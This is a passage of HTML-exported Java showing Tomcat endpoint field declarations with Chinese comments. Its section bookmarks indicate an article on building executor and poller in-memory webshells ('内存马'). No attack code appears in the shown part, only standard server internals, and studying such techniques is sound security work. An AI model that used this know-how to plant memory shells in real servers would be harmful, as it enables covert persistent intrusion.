Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">SocketProperties</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 接收线程，接收连接并交给工作线程 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">List</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Acceptor</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">U</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">>></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> acceptors</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* Socket处理对象的缓存栈 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> SynchronizedStack</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">SocketProcessorBase</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">S</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">>></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> processorCache</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 接收线程数量，默认为1 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> acceptorThreadCount </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">1</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 接收线程的优先级 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> acceptorThreadPriority </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Thread</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">NORM_PRIORITY</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 最大连接数nio模式默认10000，Apr模式默认8*1024 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> maxConnections </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">10000</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* keepAlive时间，没有设置则使用soTimeout */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Integer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> keepAliveTimeout </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span 